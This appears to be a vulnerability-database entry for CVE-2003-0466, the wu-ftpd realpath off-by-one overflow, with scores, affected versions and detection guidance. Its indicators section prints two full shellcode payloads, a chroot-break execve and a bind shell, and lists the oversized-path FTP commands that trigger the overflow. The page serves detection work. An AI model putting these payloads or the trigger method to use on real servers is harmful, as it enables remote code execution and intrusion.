cbcvebase.
CVE-2003-0466
published 2003-08-27

CVE-2003-0466: Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in…

PriorityP355critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
78.11%
99.5th percentile
Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.

Affected

8 ranges
VendorProductVersion rangeFixed in
applemac_os_x
applemac_os_x_server
freebsdfreebsd4.0 – 5.0
netbsdnetbsd1.5 – 1.6.1
openbsdopenbsd2.0 – 3.3
redhatwu_ftpd
sunsolaris
wuftpdwu-ftpd2.5.0 – 2.6.2

Detection & IOCsextracted from sources · hover to see the quote

commandSTOR
commandMKD <MAXPATHLEN+1 length path>
commandMLST <oversized path buffer>
urlhttp://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
bytes
\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31
bytes
\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
  • Detect FTP banner strings 'wu-2.6.0', 'wu-2.6.1', or 'wu-2.6.2' in the FTP 220 greeting — the exploit's own banner scanner checks for these exact strings to confirm a vulnerable target.
  • Alert on FTP commands (STOR, RETR, APPE, DELE, MKD, RMD, STOU, RNTO) carrying path arguments at or exceeding MAXPATHLEN+1 (typically 1025 bytes on BSD/Linux), which is the trigger condition for the off-by-one overflow.
  • Monitor for unexpected outbound TCP connections from the FTP server process to port 41254, which is the bind-shell port used by the FreeBSD-targeted shellcode payload.
  • Detect the Linux exploit shellcode NOP sled + payload byte sequence starting with \x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80 in FTP command payloads (setuid/chroot-break/execve shellcode by Lam3rZ).
  • Detect the BSD exploit shellcode byte sequence starting with \x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80 in FTP command payloads (Lam3rZ chroot() code rewritten for FreeBSD by venglin).
  • Flag FTP sessions where a large number of MKD commands are issued in rapid succession with incrementally varying long directory names — this is the exploit's directory-creation loop used to stage the overflow path.
  • ·Statically linked programs embedding their own realpath() copy are not fixed by patching the C library alone and require rebuilding against a patched libc.
  • ·The vulnerability affects wu-ftpd versions 2.5.0 through 2.6.2; the exploit targets 2.6.0, 2.6.1, and 2.6.2 with platform-specific return addresses for RedHat Linux 6.x, FreeBSD 4.6.2-RELEASE, and OpenBSD 3.0.
  • ·The exploit uses 0xff byte doubling in the attack buffer construction to avoid path-separator issues; IDS signatures must account for this encoding when matching shellcode in FTP command streams.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.